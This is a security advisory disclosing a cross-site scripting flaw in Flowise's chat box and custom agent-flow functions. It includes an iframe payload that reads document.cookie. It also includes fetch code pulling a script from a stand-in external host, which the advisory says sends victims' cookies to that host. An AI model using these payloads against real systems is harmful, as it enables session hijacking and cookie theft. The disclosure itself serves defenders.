Flowise vulnerable to XSS

Published: Oct 3, 2025
Updated: Oct 4, 2025
GHSA: <a href="https://github.com/advisories/GHSA-4fr9-3x69-36wv" target="_blank" rel="noopener"> GHSA-4fr9-3x69-36wv
Severity: Medium
Exploit:

Summary

A XSS(cross-site scripting) vulnerability is caused by insufficient filtering of input by web applications. Attackers can leverage this XSS vulnerability to inject malicious script code (HTML code or client-side Javascript code) into web pages, and when users browse these web pages, the malicious code will be executed, and the victims may be vulnerable to various attacks such as cookie data theft, etc.

Details

Send a Message <iframe src="javascript:alert(document.cookie);"> from User in a chat box: <img width="1396" alt="image" src="https://github.com/user-attachments/assets/b472e304-9e7a-40d2-8469-675a5f0744e5" />

Trigger in other ways:

Create a Agentflow in cloud platform (https://cloud.flowiseai.com/agentflows)
Create a Custom function as an example, use the below example code.

const fetch = require(&#039;node-fetch&#039;);
const url = &#039;https://external.website&#039;;
const options = {
    method: &#039;GET&#039;,
    headers: {
        &#039;Content-Type&#039;: &#039;application/json&#039;
    }
};
try {
    const response = await fetch(url, options);
    const text = await response.text();
    return text;
} catch (error) {
    console.error(error);
    return &#039;&#039;;
}

The external website (https://external.website) return a XSS payload as content. <img width="1228" alt="image" src="https://github.com/user-attachments/assets/2e0a4d1c-45bf-4c5f-b1b4-54c51f35ce53" />
The javascript code is executed and the victim's cookie data is sent to the external website. <img width="1212" alt="image" src="https://github.com/user-attachments/assets/4ea17dab-c456-4a51-94f4-93fe9aa18cf7" />